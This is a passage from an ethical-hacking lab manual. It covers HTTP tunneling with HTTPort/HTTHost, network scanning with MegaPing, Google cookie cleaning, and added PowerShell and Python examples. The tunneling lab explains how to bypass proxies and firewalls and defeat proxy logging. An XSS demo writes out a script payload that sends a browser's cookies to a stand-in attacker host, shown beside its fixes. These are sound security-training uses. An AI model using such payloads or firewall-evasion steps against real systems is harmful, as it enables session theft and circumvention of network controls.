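    src, dst = bytes([10, 0, 0, 7]), bytes([10, 0, 0, 4])
    tcp = struct.pack("!HHIIHHHH", 49152, dst_port, 1000, 0,
                      (5 << 12) | flags, 8192, 0, 0)  # TCP checksum left 0
    ip_no_csum = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp),
                             0x1234, 0x4000, ttl, 6, 0, src, dst)
    csum = ipv4_checksum(ip_no_csum)
    return ip_no_csum[:10] + struct.pack("!H", csum) + ip_no_csum[12:] + tcp


if __name__ == "__main__":
    parsed = parse_ipv4_tcp(build_sample_packet())
    for key in ("src_ip", "dst_ip", "src_port", "dst_port", "flags",
                "ip_header_len", "ttl", "protocol", "ip_checksum_ok"):
        print(f"{key:15} {parsed[key]}")
    print("signatures:", match_signatures(parsed))
```

Feeding the parser real captures means stripping the link-layer header first (14 bytes for Ethernet); the TCP checksum is reported but not verified here because that needs the pseudo-header.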

Lab Objectives

This lab will show you how networks can be scanned and how to use HTTPort and HTTHost.

Lab Environment

In the lab, you need the HTTPort tool.


HTTPort is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTPort

You can also download the latest version of HTTPort from the link http://www.targeted.org/

If you decide to download the latest version, then the screenshots shown in the lab might differ.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

■ Install HTTHost on the Windows Server 2008 Virtual Machine
■ Install HTTPort on the Windows Server 2012 Host Machine
■ Follow the wizard-driven installation steps and install it.
■ Administrative privileges are required to run this tool
■ This lab might not work if the remote server filters/blocks HTTP tunneling packets

Lab Duration

Time: 20 Minutes

Overview of HTTPort

HTTPort creates a transparent tunnel through a proxy server or firewall. HTTPort allows using all sorts of Internet software from behind the proxy. It bypasses HTTP proxies, HTTP firewalls, and transparent accelerators.

Lab Tasks

Stopping IIS Services

1. Before running the tool you need to stop the IIS Admin Service and World Wide Web Publishing services on the Windows Server 2008 virtual machine.
2. Go to Services (administrative privileges are required), right-click IIS Admin Service, and click the Stop option.

HTTPort creates a transparent tunnel through a proxy server or firewall. This allows you to use all sorts of Internet software from behind the proxy.


FIGURE 14.1: Stopping IIS Admin Service in Windows Server 2008

3. Go to Services, right-click World Wide Web Publishing Services, and click the Stop option.

It bypasses HTTPS and HTTP proxies, transparent accelerators, and firewalls. It has a built-in SOCKS4 server.

FIGURE 14.2: Stopping World Wide Web Services in Windows Server 2008

It supports strong traffic encryption, which makes proxy logging useless, and supports NTLM and other authentication schemes.

4. Open the Mapped Network Drive "CEH-Tools" Z:\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTHost.
5. Open the HTTHost folder and double-click htthost.exe.
6. The HTTHost wizard will open; select the Options tab.
7. On the Options tab, set all the settings to default except the Personal Password field, which should be filled in with any other password. In this lab, the personal password is "magic".


8. Check the Revalidate DNS names and Log Connections options and click Apply.

To set up HTTPort you need to point your browser to 127.0.0.1

FIGURE 14.3: HTTHost Options tab

9. Now leave HTTHost intact, and don't turn off the Windows Server 2008 Virtual Machine.
10. Now switch to the Windows Server 2012 Host Machine, and install HTTPort from D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTPort by double-clicking httport3snfm.exe.

HTTPort goes with the predefined mapping "External HTTP proxy" of local port

11. Follow the wizard-driven installation steps.
12. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

FIGURE 14.4: Windows Server 2012 - Desktop View

13. Click the HTTPort 3.SNFM app to open the HTTPort 3.SNFM window.


FIGURE 14.5: Windows Server 2012 - Apps

14. The HTTPort 3.SNFM window appears as shown in the figure that follows.

For each piece of software, create custom mappings, given all the addresses from which it operates. For applications that dynamically change their ports there is a SOCKS4-proxy mode, in which the software will create a local SOCKS server (127.0.0.1).

FIGURE 14.6: HTTPort Main Window

15. Select the Proxy tab and enter the host name or IP address of the targeted machine.
16. Here as an example: enter the Windows Server 2008 virtual machine IP address, and enter Port number 80.
17. You cannot set the Username and Password fields.
18. In the Use personal remote host at section, click Start and then Stop, and then enter the targeted Host machine IP address and port, which should be 80.


19. Here any password could be used. Here as an example: Enter the password as "magic".

In a real-world environment, people sometimes use a password-protected proxy to let company employees access the Internet.

FIGURE 14.7: HTTPort Proxy settings window

20. Select the Port Mapping tab and click Add to create a New Mapping.

HTTHost supports registration, but it is free and password-free: you will be issued a unique ID, with which you can contact the support team and ask your questions.

FIGURE 14.8: HTTPort creating a New Mapping

21. Select the New Mapping node, right-click New Mapping, and click Edit.


FIGURE 14.9: HTTPort Editing to assign a mapping

22. Rename this to ftp certified hacker, 21 and select the Local port node; then right-click to Edit and enter the Port value 21.
23. Now right-click on the Remote host node to Edit and rename it as ftp.certifiedhacker.com.
24. Now right-click on the Remote port node to Edit and enter the port value 21.

In this kind of environment, the federated search web part of Microsoft Search Server 2008 will not work out-of-the-box because we only support a non-password-protected proxy.

FIGURE 14.10: HTTPort Static TCP/IP port mapping

25. Click Start on the Proxy tab of HTTPort to run the HTTP tunneling.


HTTP is the basis for Web surfing, so if you can freely surf the Web from where you are, HTTPort will bring you the rest of the Internet applications.

FIGURE 14.11: HTTPort to start tunneling

26. Now switch to the Windows Server 2008 virtual machine and click the Application log tab.
27. Check the last line; if it is Listener listening at 0.0.0.0:80, then it is running properly.

To make a data tunnel through the password-protected proxy, we can map an external website to a local port and federate the search result.

FIGURE 14.12: HTTHost Application log section

28. Now switch to the Windows Server 2012 host machine and turn ON the Windows Firewall.
29. Go to Windows Firewall with Advanced Security.


30. Select Outbound Rules from the left pane of the window, and then click New Rule in the right pane of the window.

FIGURE 14.13: Windows Firewall with Advanced Security window in Windows Server 2008

31. In the New Outbound Rule Wizard, select the Port option in the Rule Type section and click Next.

Tools demonstrated in this lab are available in Z:\ Mapped Network Drive in Virtual Machines

FIGURE 14.14: Windows Firewall selecting a Rule Type

CEH Lab Manual Page 229

Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Module 03 - Scanning Networks

32. Now select All remote ports in the Protocol and Ports section, and click Next.

HTTPort doesn't really care for the proxy as such; it works perfectly with firewalls, transparent accelerators, NATs, and basically anything that lets the HTTP protocol through.

FIGURE 14.15: Windows Firewall assigning Protocols and Ports

33. In the Action section, select the Block the connection option and click Next.

You need to install HTThost on a PC which is generally accessible on the Internet, typically your "home" PC. This means that if you started a web server on the home PC, everyone else must be able to connect to it. There are two showstoppers for HTThost on home PCs.

FIGURE 14.16: Windows Firewall setting an Action

34. In the Profile section, select all three options (Domain, Private, and Public) under "The rule will apply to:", and then click Next.

NAT/firewall issues: You need to enable an incoming port. For HTThost it will typically be 80 (http) or 443 (https), but any port can be used - IF the HTTP proxy at work supports it - some proxies are configured to allow only 80 and 443.

FIGURE 14.17: Windows Firewall Profile settings

35. Type Port 21 Blocked in the Name field, and click Finish.

The default TCP port for FTP connection is port 21. Sometimes the local Internet Service Provider blocks this port and this will result in FTP

FIGURE 14.18: Windows Firewall assigning a name to Port

36. The new rule Port 21 Blocked is created as shown in the following figure.

FIGURE 14.19: Windows Firewall new rule

37. Right-click the newly created rule and select Properties.

HTTPort then intercepts that connection and runs it through a tunnel through the proxy.

FIGURE 14.20: Windows Firewall new rule properties

38. Select the Protocols and Ports tab. Change the Remote Port option to Specific Ports and enter the Port number as 21.

39. Leave the other settings as their defaults and click Apply, then click OK.

HTTPort enables you to bypass your HTTP proxy in case it blocks you from the Internet.

With HTTPort, you can use various Internet software from behind the proxy, e.g., e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC etc. The basic idea is that you set up your Internet software

FIGURE 14.21: Firewall Port 21 Blocked Properties
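The rule from steps 31 to 39 and the check from step 40, as an added example that is not part of the CEH manual or of the Windows documentation: the rule is built from an elevated PowerShell prompt with netsh advfirewall, which is present on Windows Server 2008 and later (the lab's firewall host), and verified with a plain TCP connect instead of the ftp client. The rule name and remote port are the lab's; the target host, the helper function name and the timeout are assumptions.

```powershell
# Added example, not from the CEH manual: the outbound rule of steps 31-39 created from an
# elevated PowerShell prompt. netsh advfirewall exists on Windows Server 2008 and later, so it
# works on the lab's Server 2008 firewall host (New-NetFirewallRule needs Server 2012 or later).
$ruleName = 'Port 21 Blocked'

# Wizard settings in one line: outbound, TCP, any local port, remote port 21, block, all three profiles.
netsh advfirewall firewall add rule name="$ruleName" dir=out action=block protocol=TCP remoteport=21 profile=any

# Read the rule back; expect Direction: Out, Action: Block, RemotePort: 21, Profiles: Domain,Private,Public.
netsh advfirewall firewall show rule name="$ruleName"

# Step 40 without the ftp client: a plain TCP connect to port 21 should now fail from this host.
# Test-OutboundPort is a hypothetical helper written for this example.
function Test-OutboundPort {
    param([string]$HostName, [int]$Port = 21, [int]$TimeoutMs = 3000)
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $pending = $client.BeginConnect($HostName, $Port, $null, $null)
        # $true only if the TCP handshake completed inside the timeout.
        return [bool]($pending.AsyncWaitHandle.WaitOne($TimeoutMs) -and $client.Connected)
    } catch {
        return $false   # the block rule surfaces as a failed connect
    } finally {
        $client.Close()
    }
}

# ftp.certifiedhacker.com is the lab's FTP target; use a host you are permitted to test against.
if (Test-OutboundPort -HostName 'ftp.certifiedhacker.com' -Port 21) {
    'Port 21 reachable: the rule is not in effect'
} else {
    'Port 21 unreachable: outbound FTP control connections are blocked'
}

# Remove the rule once the test is finished (not a lab step):
# netsh advfirewall firewall delete rule name="$ruleName"
```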

40. Type ftp ftp.certifiedhacker.com in the command prompt and press Enter. The connection is blocked in Windows Server 2008 by the firewall.

HTTPort does neither freeze nor hang. What you are experiencing is known as "blocking operations".

FIGURE 14.22: ftp connection is blocked

41. Now open the command prompt on the Windows Server 2012 host machine, type ftp 127.0.0.1, and press Enter.

HTTPort makes it possible to open a client side of a TCP/IP connection and provide it to any software. The keywords here are: "client" and "any software".

FIGURE 14.23: Executing ftp command

Lab Analysis

Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.

Tool/Utility: HTTPort

Information Collected/Objectives Achieved:
Proxy server used: 10.0.0.4
Port scanned: 80
Result: ftp 127.0.0.1 connected to 127.0.0.1

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. How do you set up HTTPort to use an email client (Outlook, Messenger, etc.)?
2. Examine if software does not allow editing the address to connect to.

Internet Connection Required: Yes
Platform Supported: Classroom, iLabs

Basic Network Troubleshooting Using MegaPing

MegaPing is an ultimate toolkit that provides complete essential utilities for information system administrators and IT solution providers.

Lab Scenario

You have learned in the previous lab that HTTP tunneling is a technique where communications within network protocols are captured using the HTTP protocol. For any companies to exist on the Internet, they require a web server. These web servers prove to be a high data value target for attackers. The attacker usually exploits the WWW server running IIS and gains command line access to the system. Once a connection has been established, the attacker uploads a precompiled version of the HTTP tunnel server (hts). With the server set up, the attacker then starts a client on his or her system and directs its traffic to the hts server. The hts process listens to the SRC port of the system running on port 80 of the WWW host and redirects traffic. The hts process captures the traffic in HTTP headers and forwards it to the WWW server port 80, after which the attacker tries to log in to the system; once access is gained he or she sets up additional tools to further exploit the network. MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports.

In this lab you will learn to use MegaPing to check for vulnerabilities and troubleshoot issues.

Lab Objectives

This lab gives an insight into pinging to a destination address list. It teaches how to:
■ Ping a destination address list
■ Traceroute
■ Perform NetBIOS scanning

Lab Environment

To carry out the lab, you need:
■ MegaPing is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\MegaPing
■ You can also download the latest version of MegaPing from the link http://www.magnetosoft.com/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Administrative privileges to run tools
■ TCP/IP settings correctly configured and an accessible DNS server
■ This lab will work in the CEH lab environment, on Windows Server 2012, Windows 2008, and Windows 7

PING stands for Packet Internet Groper.

Lab Duration

Time: 10 Minutes

Overview of Ping

The ping command sends Internet Control Message Protocol (ICMP) echo request packets to the target host and waits for an ICMP response. During this request-response process, ping measures the time from transmission to reception, known as round-trip time, and records any lost packets.

Lab Tasks

TASK 1: IP Scanning

1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 15.1: Windows Server 2012 - Desktop view

2. Click the MegaPing app to open the MegaPing window.

FIGURE 15.2: Windows Server 2012 - Apps

3. The MegaPing main window appears as shown in the following figure.

All Scanners can scan individual computers, any range of IP addresses, domains, and selected types of computers inside domains.

FIGURE 15.3: MegaPing main window

Security scanner provides the following information: NetBIOS names, Configuration info, open TCP and UDP ports, Transports, Shares, Users, Groups, Services, Drivers, Local Drives, Sessions, Remote Time of Date, Printers.

4. Select any one of the options from the left pane of the window.

5. Select IP scanner, and type in the IP range in the From and To fields; in this lab the IP range is from 10.0.0.1 to 10.0.0.254. Click Start.

6. You can select the IP range depending on your network.

FIGURE 15.4: MegaPing IP Scanning

7. It will list down all the IP addresses under that range with their TTL (Time to Live), Status (dead or alive), and the statistics of the dead and alive hosts.

Network utilities: DNS list host, DNS lookup name, Network Time Synchronizer, Ping, Traceroute, Whois, and Finger.

FIGURE 15.5: MegaPing IP Scanning Report
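The IP scan of steps 5 to 7 done from PowerShell, as an added example that is not part of the manual and does not use MegaPing: the .NET Ping class sends the ICMP echo requests described in the overview, and the function builds the same Address, Time, TTL and Status columns plus the Total/Active/Failed summary of the MegaPing report. The 10.0.0.0/24 prefix matches the lab's range; the function name and the 500 ms timeout are assumptions.

```powershell
# Added example, not from the CEH manual or from MegaPing: a ping sweep over the lab range
# 10.0.0.1-10.0.0.254 that collects the per-host fields of the MegaPing IP Scanner report
# (round-trip time, TTL of the reply, Alive/Dead) plus the Total/Active/Failed host statistics.
# Invoke-PingSweep is a hypothetical function name chosen for this example.
function Invoke-PingSweep {
    param(
        [string]$Prefix   = '10.0.0.',   # assumed /24 prefix; the lab scans 10.0.0.1 to 10.0.0.254
        [int]$First       = 1,
        [int]$Last        = 254,
        [int]$TimeoutMs   = 500          # assumed wait for each ICMP echo reply
    )

    $pinger = New-Object System.Net.NetworkInformation.Ping
    $hosts  = foreach ($i in $First..$Last) {
        $ip = "$Prefix$i"
        try {
            # One ICMP echo request; Send() blocks until the echo reply arrives or the timeout elapses.
            $reply = $pinger.Send($ip, $TimeoutMs)
        } catch {
            $reply = $null                # e.g. no route to the network or a socket error
        }
        $alive  = ($null -ne $reply -and $reply.Status -eq 'Success')
        # RoundtripTime is the transmission-to-reception time in ms that the overview calls round-trip time.
        $time   = if ($alive) { $reply.RoundtripTime } else { $null }
        # Options carries the IP header fields of the reply; its Ttl is the TTL column in MegaPing.
        $ttl    = if ($alive -and $null -ne $reply.Options) { $reply.Options.Ttl } else { $null }
        $status = if ($alive) { 'Alive' } else { 'Dead' }
        [pscustomobject]@{
            Address = $ip
            TimeMs  = $time
            TTL     = $ttl
            Status  = $status
        }
    }
    $pinger.Dispose()

    # Host statistics as shown in the MegaPing summary pane (Total / Active / Failed).
    $active = @($hosts | Where-Object { $_.Status -eq 'Alive' }).Count
    [pscustomobject]@{
        Hosts  = $hosts
        Total  = @($hosts).Count
        Active = $active
        Failed = @($hosts).Count - $active
    }
}

# Sequential sweep: worst case roughly 254 x 500 ms on an empty subnet.
$sweep = Invoke-PingSweep
$sweep.Hosts | Where-Object { $_.Status -eq 'Alive' } | Format-Table Address, TimeMs, TTL, Status -AutoSize
"Total: $($sweep.Total)  Active: $($sweep.Active)  Failed: $($sweep.Failed)"
```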

TASK 2: NetBIOS Scanning

8. Select the NetBIOS Scanner from the left pane and type in the IP range in the From and To fields. In this lab, the IP range is from 10.0.0.1 to 10.0.0.254. Click Start.

MegaPing can scan your entire network and provide information such as open shared resources, open ports, services/drivers active on the computer, key registry entries, users and groups, trusted domains, printers, and more.

FIGURE 15.6: MegaPing NetBIOS Scanning

9. The NetBIOS scan will list all the hosts with their NetBIOS names and adapter addresses.

Scan results can be saved in HTML or TXT reports, which can be used to secure your network - for example, by shutting down unnecessary ports, closing shares, etc.

FIGURE 15.7: MegaPing NetBIOS Scanning Report

10. Right-click the IP address. In this lab, the selected IP is 10.0.0.4; it will be different in your network.

TASK 3: Traceroute

11. Then, right-click and select the Traceroute option.

Other features include a multithreaded design that allows processing any number of requests in any tool at the same time, real-time network connection status and protocol statistics, real-time process information and usage, real-time network information including network connections and open network files, system tray support, and more.

FIGURE 15.8: MegaPing Traceroute

12. It will open the Traceroute window, and will trace the selected IP address.

FIGURE 15.9: MegaPing Traceroute Report

TASK 4: Port Scanning

13. Select Port Scanner from the left pane, add www.certifiedhacker.com to the Destination Address List, and then click the Start button.

14. After clicking the Start button it toggles to Stop.

15. It will list the ports associated with www.certifiedhacker.com with the keyword, risk, and port number.

FIGURE 15.10: MegaPing Port Scanning Report

Lab Analysis

Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.

Tool/Utility: MegaPing

Information Collected/Objectives Achieved:
IP Scan Range: 10.0.0.1 - 10.0.0.254
Performed Actions:
■ IP Scanning
■ NetBIOS Scanning
■ Traceroute
■ Port Scanning
Result:
■ List of Active Hosts
■ NetBIOS Name
■ Adapter Name

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. How does MegaPing detect security vulnerabilities on the network?
2. Examine the report generation of MegaPing.

Internet Connection Required: No
Platform Supported: Classroom, iLabs

L ab

D e te c t, D elete a n d B lock G oogle C o o k ies U sing G -Z apper
G-Zapper is a utility to block Goog/e cookies, dean Google cookies, a n d help yon stay anonymous while searching online. I CON
Lab Scenario

You have learned in the previous lab that MegaPing is a security scanner that checks for potential vulnerabilities in your network that might be used to attack it, and saves the information in security reports. It provides detailed information about all computers and network appliances. It scans your entire network and reports information such as open shared resources, open ports, services/drivers active on the computer, key registry entries, users and groups, trusted domains, printers, etc. Scan results can be saved in HTML or TXT reports, which can be used to secure your network. As an administrator, you can organize safety measures to block attackers from intruding into the network by shutting down unnecessary ports, closing shares, etc. As another aspect of prevention you can use G-Zapper, which blocks Google cookies, cleans Google cookies, and helps you stay anonymous while searching online. This way you can protect your identity and search history.

Lab Objectives

This lab explains how G-Zapper automatically detects and cleans the Google cookie each time you use your web browser.

Lab Environment

To carry out the lab, you need:


■ G-Zapper, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Anonymizers\G-Zapper
■ You can also download the latest version of G-Zapper from the link http://www.dummysoftware.com/
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ Install G-Zapper in Windows Server 2012 by following the wizard-driven installation steps
■ Administrative privileges to run tools
■ A computer running Windows Server 2012

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Duration

Time: 10 Minutes

Overview of G-Zapper

G-Zapper helps protect your identity and search history. G-Zapper will read the Google cookie installed on your PC, display the date it was installed, determine how long your searches have been tracked, and display your Google searches. G-Zapper allows you to automatically delete the Google search cookie, or to block it entirely from future installation.

Lab Tasks

Task 1: Detect & Delete Google Cookies

1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 16.1: Windows Server 2012 - Desktop view

2. Click the G-Zapper app to open the G-Zapper window.

Note: G-Zapper is compatible with Windows 95, 98, ME, NT, 2000, XP, Vista, and Windows 7.

FIGURE 16.2: Windows Server 2012 - Apps (the Start screen showing the G-Zapper tile)

3. The G-Zapper main window appears as shown in the following screenshot.

FIGURE 16.3: G-Zapper main window. The window explains that Google stores a unique identifier in a cookie on your PC, which allows them to track the keywords you search for, and that G-Zapper will automatically detect and clean this cookie in your web browser. In this run it reports: "A Google Tracking ID exists on your PC", Your Google ID (Chrome) 6b4b4d9fe5c60cc1, Google installed the cookie on Wednesday, September 05, 2012 01:54:46 AM, Your searches have been tracked for 13 hours, and "No Google searches found in Internet Explorer or Firefox". To delete the Google cookie, click the Delete Cookie button; your identity will be obscured from previous searches and G-Zapper will regularly clean future cookies. To restore the Google search cookie, click the Restore Cookie button. Buttons: Delete Cookie, Restore Cookie, Test Google, Settings, Register.

4. To delete the Google search cookies, click the Delete Cookie button; a window will appear that gives information about the deleted cookie location. Click OK.

Note: A new cookie will be generated upon your next visit to Google, breaking the chain that relates your searches.

FIGURE 16.4: Deleting search cookies. The message reads: "The Google search cookie was removed and will be re-created with a new ID upon visiting www.google.com. The cookie was located at (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite". The window also notes that to block and delete the Google search cookie you click the Block Cookie button (Gmail and AdSense will be unavailable with the cookie blocked).

5. To block the Google search cookie, click the Block Cookie button. A window will appear asking if you want to manually block the Google cookie. Click Yes.

Note: The tiny tray icon runs in the background, takes up very little space, and can notify you by sound and animation when the Google cookie is blocked.

FIGURE 16.5: Block Google cookie. The confirmation dialog "Manually Blocking the Google Cookie" reads: "Gmail and other Google services will be unavailable while the cookie is manually blocked. If you use these services, we recommend not blocking the cookie and instead allow G-Zapper to regularly clean the cookie automatically. Are you sure you wish to manually block the Google cookie?" with Yes and No buttons.

6. It will show a message that the Google cookie has been blocked. Click OK, then verify as described in the next step.

Note: G-Zapper can also clean your Google search history in Internet Explorer and Mozilla Firefox. It is far too easy for someone using your PC to get a glimpse of what you have been searching for.

FIGURE 16.6: Block Google cookie (2). The message reads: "The Google cookie has been blocked. You may now search anonymously on google.com. Click the Test Google button to verify."

7. To test that the Google cookie has been blocked, click the Test Google button.

8. Your default web browser will now open to Google's Preferences page. Click OK.
FIGURE 16.7: Cookies disabled message. Google's Preferences page reports: "Your cookies seem to be disabled. Setting preferences will not work until you enable cookies in your browser."

9. To view the deleted cookie information, click the Settings button, and then click View Log in the Cleaned Cookies Log section.

Note: You can simply run G-Zapper, minimize the window, and enjoy your enhanced search privacy.

FIGURE 16.8: Viewing the deleted logs. The G-Zapper Settings dialog offers: Sounds (Play sound effect when a cookie is deleted: default.wav, with Preview and Browse); Google Analytics Tracking (Block Google Analytics from tracking web sites that I visit); Cleaned Cookies Log (Enable logging of cookies that have recently been cleaned; Save my Google ID in the cleaned cookies log; Clear Log; View Log); OK.

10. The deleted cookies information opens in Notepad (cookiescleaned - Notepad), one cookie store per line with the time it was cleaned:

(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite   Friday, August 31, 2012 10:42:13 AM
(Chrome) C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies   Friday, August 31, 2012 11:04:20 AM
(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite   Friday, August 31, 2012 11:06:23 AM
(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite   Wednesday, September 05, 2012 02:52:38 PM

FIGURE 16.9: Deleted logs report
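What the detect and delete steps above actually do is read the browser's cookie store (for Firefox, the cookies.sqlite file the log lists), find the cookies set by Google hosts, report when they were set, and remove them so that a fresh ID is issued on the next visit. The Python below is an added example written for this page; it is not G-Zapper's code or anything from dummysoftware.com. It uses a cut-down version of Firefox's moz_cookies table (only the columns it needs; the column names and the microsecond creationTime convention are assumptions about the real schema), fills it with constructed sample rows, and assumes the per-browser identifier sits in the ID= field of the PREF cookie value, which is where a "Google ID" like the one in Figure 16.3 was carried.

```python
import sqlite3
import time
from datetime import datetime, timezone

# Simplified Firefox moz_cookies layout (assumption: only the columns used here).
SCHEMA = """
CREATE TABLE moz_cookies (
    id INTEGER PRIMARY KEY,
    name TEXT, value TEXT, host TEXT, path TEXT,
    expiry INTEGER,        -- seconds since the epoch
    creationTime INTEGER   -- microseconds since the epoch (Firefox convention)
);
"""

TRACKING_DOMAINS = ("google.com", "google-analytics.com")


def make_sample_store(now):
    """In-memory cookie store filled with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    rows = [
        # PREF cookie with the ID=... field (assumed layout), set 13 hours before `now`
        ("PREF", "ID=6b4b4d9fe5c60cc1:TM=1346804086", ".google.com", "/",
         int(now) + 2 * 365 * 86400, int((now - 13 * 3600) * 1e6)),
        ("NID", "67=constructed", ".google.com", "/",
         int(now) + 180 * 86400, int((now - 2 * 3600) * 1e6)),
        ("session", "keepme", "example.org", "/",
         int(now) + 86400, int(now * 1e6)),
    ]
    db.executemany(
        "INSERT INTO moz_cookies (name, value, host, path, expiry, creationTime) "
        "VALUES (?, ?, ?, ?, ?, ?)", rows)
    db.commit()
    return db


def is_tracking_host(host):
    """Match on a label boundary so 'notgoogle.com' is not treated as Google."""
    h = host.lstrip(".").lower()
    return any(h == d or h.endswith("." + d) for d in TRACKING_DOMAINS)


def google_id_from_value(value):
    """Pull the ID=... field out of a PREF-style cookie value, if present."""
    for part in value.split(":"):
        if part.startswith("ID="):
            return part[3:]
    return None


def find_tracking_cookies(db, now):
    """Report each Google cookie: host, identifier, install time and tracking age."""
    found = []
    cur = db.execute(
        "SELECT name, value, host, creationTime FROM moz_cookies ORDER BY creationTime")
    for name, value, host, created_us in cur:
        if not is_tracking_host(host):
            continue
        created = datetime.fromtimestamp(created_us / 1e6, tz=timezone.utc)
        found.append({
            "name": name, "host": host,
            "google_id": google_id_from_value(value),
            "installed": created.isoformat(),
            "tracked_hours": (now - created_us / 1e6) / 3600,
        })
    return found


def delete_tracking_cookies(db):
    """Delete the Google cookies and return how many rows were removed.
    A fresh cookie with a new ID is set on the next visit, which breaks the
    chain linking old and new searches (the effect G-Zapper's dialog describes)."""
    ids = [row[0] for row in db.execute("SELECT id, host FROM moz_cookies")
           if is_tracking_host(row[1])]
    db.executemany("DELETE FROM moz_cookies WHERE id = ?", [(i,) for i in ids])
    db.commit()
    return len(ids)


def remaining_hosts(db):
    """Hosts that still have cookies after cleaning (non-Google sites are untouched)."""
    return sorted(h for (h,) in db.execute("SELECT host FROM moz_cookies"))


if __name__ == "__main__":
    now = time.time()
    store = make_sample_store(now)
    for c in find_tracking_cookies(store, now):
        print(f"{c['host']:<24}{c['name']:<6}id={c['google_id']} "
              f"set {c['installed']} tracked {c['tracked_hours']:.1f} h")
    print("deleted:", delete_tracking_cookies(store), "left:", remaining_hosts(store))
```

Run it against a copy of a real profile's cookies.sqlite by replacing make_sample_store with sqlite3.connect(path) while the browser is closed; Firefox keeps the file locked and may hold cookies in a write-ahead log, so delete with the browser shut down, exactly as the tool's "cookie was located at" message implies.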

Lab Analysis

Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.


Tool/Utility: G-Zapper

Information Collected/Objectives Achieved:
  Action Performed:
  ■ Detect the cookies
  ■ Delete the cookies
  ■ Block the cookies
  Result: Deleted cookies are stored in C:\Users\Administrator\Application Data

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Examine how G-Zapper automatically cleans Google cookies.

2. Check to see if G-Zapper is blocking cookies on sites other than Google.

Internet Connection Required: ☑ Yes ☐ No

Platform Supported: ☑ Classroom ☐ iLabs

Lab

Scanning the Network Using the Colasoft Packet Builder

The Colasoft Packet Builder is a useful tool for creating custom network packets.
Lab Scenario

In the previous lab you learned how you can detect, delete, and block cookies. Attackers exploit XSS vulnerabilities, which involve an attacker pushing malicious JavaScript code into a web application. When another user visits a page with that malicious code in it, the user's browser will execute the code. The browser has no way of telling the difference between legitimate and malicious code. Injected code is another mechanism that an attacker can use for session hijacking: by default, cookies stored by the browser can be read by JavaScript code unless they carry the HttpOnly flag. The injected code can read a user's cookies and transmit those cookies to the attacker. As an expert ethical hacker and penetration tester you should be able to prevent such attacks by validating all headers, cookies, query strings, form fields, and hidden fields; encoding input and output and filtering metacharacters in the input; and using a web application firewall to block the execution of malicious scripts. Another method of vulnerability checking is to scan a network using the Colasoft Packet Builder. This lab introduces the packet-crafting side of sniffing network packets, performing ARP poisoning, spoofing the network, and DNS poisoning.
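To make the prevention advice concrete, here is an added Python example (not from the original manual or from any product it names) showing the two controls that break the cookie-theft chain described above: output encoding, so injected markup is rendered as text rather than executed, and the HttpOnly, Secure and SameSite cookie flags, so a script cannot read the session cookie even if an injection does land. The comment payload and the host attacker.invalid are constructed for the demonstration.

```python
import html
from http.cookies import SimpleCookie

COOKIE_FLAGS = ("HttpOnly", "Secure", "SameSite")


def render_comment_unsafe(text):
    """Vulnerable: user text is pasted into the page as markup, so a stored
    <script> runs in every visitor's browser (the XSS the scenario describes)."""
    return f"<p class='comment'>{text}</p>"


def render_comment(text):
    """Hardened: output-encode, so the same input is displayed as visible text."""
    return f"<p class='comment'>{html.escape(text, quote=True)}</p>"


def session_cookie_header(value, secure=True):
    """Set-Cookie value with the flags that keep the session ID away from script."""
    c = SimpleCookie()
    c["sid"] = value
    c["sid"]["httponly"] = True      # not exposed through document.cookie
    c["sid"]["secure"] = secure      # never sent over plain HTTP
    c["sid"]["samesite"] = "Strict"  # not attached to cross-site requests
    c["sid"]["path"] = "/"
    return c["sid"].OutputString()


def missing_cookie_flags(set_cookie):
    """Audit a Set-Cookie value and return the protective flags it lacks."""
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie.split(";")[1:]}
    return [flag for flag in COOKIE_FLAGS if flag.lower() not in attrs]


if __name__ == "__main__":
    # Constructed payload of the kind the scenario describes: read the cookie, send it out.
    payload = "<script>new Image().src='//attacker.invalid/?c='+document.cookie</script>"
    print(render_comment_unsafe(payload))
    print(render_comment(payload))
    print(session_cookie_header("9f3a..."), missing_cookie_flags("sid=abc; Path=/"))
```

The audit function is the useful part for a tester: feed it every Set-Cookie header a target returns and any session cookie that comes back with flags missing is one that injected script could read.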

Lab Objectives

The objective of this lab is to reinforce concepts of network security policy, policy enforcement, and policy audits.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Environment

In this lab, you need:

